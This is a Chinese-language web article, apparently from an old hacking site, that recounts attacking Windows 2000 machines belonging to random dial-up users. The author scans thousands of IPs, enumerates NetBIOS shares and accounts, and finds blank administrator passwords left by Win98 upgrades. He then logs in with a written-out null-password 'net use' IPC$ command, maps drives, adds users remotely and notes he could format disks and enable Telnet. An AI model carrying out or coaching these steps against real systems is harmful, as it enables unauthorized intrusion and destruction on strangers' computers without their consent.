目標： 我想要看 Windows 2000 安全性能怎么樣, 因此我決定嘗試一下 。對WIN2000基本的攻擊應該使用 NT 4.0，來查詢對方是否修補了漏洞 。我想你會很吃驚看到他們不但沒有修補漏洞，還有新的漏洞出現(xiàn) 。我是一 名MCSE，因此微軟向我提供了beta版本 。下面是我的評估 。
途徑：
首先，我需要找一些使用WIN2000的普通用戶，我打開IP SCANNER，找到大約6000個IP地址，這些IP都是長時間連線的撥號用戶，并且分析出使用WIN2000的用戶.好了，攻擊開始；
首先使用Table 1.1這個工具，得到WIN2000的基本信息：
NetBIOS
Share Information
Share Name :IPC$
Share Type :Default Pipe Share
Comment :Remote IPC
WARNING - Null session can be established to 24.?.?.?IPC$
Share Name :ADMIN$
Share Type :Default Disk Share
Comment :Remote Admin
Share Name :C$
Share Type :Default Disk Share
Comment :Default share
Account Information
Account Name :Administrator
The Administrator account is an ADMINISTRATOR, and the passWord was changed 3
days ago. This account has been used 2 times to logon. The default Administrator
account has not been renamed. Consider renaming this account and removing most of
its rights. Use a different account as the admin account.
Comment :Account upgraded from Windows 95 or Windows 98
User Comment :
Full name :Administrator
Account Name :Guest
The Guest account is a GUEST, and the password was
changed 0 days ago. This account has been used 0 times to logon.
Comment :Built-in account for guest access to the computer/domain
User Comment :
Full name :
Account Name :USER1
The USER1 account is an ADMINISTRATOR, and the password was
changed 3 days ago. This account has been used 22 times to logon.
Comment :Account upgraded from Windows 95 or Windows 98
User Comment :
Full name :USER1
WARNING Administrator"s password is blank
WARNING USER1"s password is blank

我覺得很奇怪 。第一是管理員帳號和另外一個用戶 ( 也一個主管 ) 口令是空白的 。這些帳號似乎是從Win98或95升級而來的，這引起了我的好奇，因此我決定了做一次嘗試 。我升級了我的一臺98的機器到 2000專業(yè)版 。這臺機器在一個點對點的網(wǎng)絡工作組里面，并且在該系統(tǒng)內有域主控服務器 。我按照提示步驟進行,升級過程很順利 。重新啟動后，出現(xiàn)設置新的WIN2000帳號密碼的窗口，它給出一張在升級過程中創(chuàng)建的帳號列表，需要我為每個用戶設置密碼 。奇怪的是 。它竟然有和WIN98一樣的密碼設置安裝的提示：[if you don not want to see
this screen again then just hit enter] 。我按下回車，進入WIN2000，而我機器上的
用戶都把密碼設置為空，這是不安全的，我又在另外幾臺WIN98機器上實驗升級2000，都創(chuàng)建了密碼為空的ADM用戶 。
現(xiàn)在，繼續(xù)攻擊 ?？赡苓€會有其他的漏洞 。
我與這些機器建立了會話,用ADM登陸
C:>net use 24.?.?.?IPC$ "" /user:Administrator
The command completed successfully.
我現(xiàn)在作為一個adm連結到這臺機器,并且能印射驅動器,并像自己的驅動器一樣瀏覽它 。WIN98升級到WIN2000的這個密碼設置的安全漏洞MS沒有注意 。
我決定繼續(xù)深入，希望發(fā)現(xiàn)WIN2000其他的漏洞我打開計算機管理器 ( PHOTO 1.2 ),與他的機器聯(lián)接 。我可以像使用我本地機器一樣的在遠程機器上增加用戶 。
photo 1.2
我深入研究計算機管理，并且發(fā)現(xiàn)那個磁盤管理也是脆弱的因此我能遠程格式化他的驅動器 。我繼續(xù)深入，注意到TELNET遠程登錄服務(POHOT1.3 )。
是microsoft在win2000的默認安裝時設置了這個TELNET服務？一個普通用戶需要telnet服務嗎？這似乎是我在安裝過程中設置的，它沒由缺省啟動，但是它被設置作為 Localsystem 登錄 。好奇心使我繼續(xù)研究.我看了服務的屬性 ( photo.1.4 ) 并且發(fā)現(xiàn)不僅我能啟動服務，而且我能使它自動啟動 。

推薦閱讀

• 

  穿書自救指南第二季什么時候播 《穿書自救指南》劇情簡介
• 

  win10創(chuàng)意者怎么取消web和應用商店個性化廣告
• 

  留置權抵押權質權順序是什么呢
• 

  什么菜刮油效果好 哪些菜刮油效果好
• 

  同站中轉無需出站是什么意思
• 

  溫州瑞安市2023年新居民積分獎勵如何領?。?
• 

  201×35的簡便計算201×35的簡便計算怎么算
• 

  橡皮樹能放室內嗎
• 

  鮮榨果汁的做法有哪些
• 

  汽車變速箱的原理是什么
• 

  為什么騰訊口碑差知乎,為什么有人說騰訊很垃圾
• 

  聲吶能發(fā)現(xiàn)水里的人嗎
• 

  學制及授予何種學位，中國學制學位區(qū)別
• 

  西安至北京自駕費用是多少費用多少錢，西安開車到北京要花費多錢多長時間
• 

  吃黑金谷的禁忌
• 

  饅頭上有一點點霉點可以吃嗎

• 詳述Win 2000日志及其刪除方法
• 1 《Undocumented Windows 2000 Secrets》翻譯 --- 第五章
• 1 《Undocumented Windows 2000 Secrets》翻譯 --- 2
• 在Windows NT域和Windows 2000域之間建立信任關系
• 移花接木 解決Windows 2000無法啟動的問題
• 使用命令行參數(shù)為系統(tǒng)打補丁
• 克隆windows 2000管理員帳號
• Windows 2000 優(yōu)化完全攻略
• Win2000模塊解析工具
• 打造更加快速優(yōu)質的Windows 2000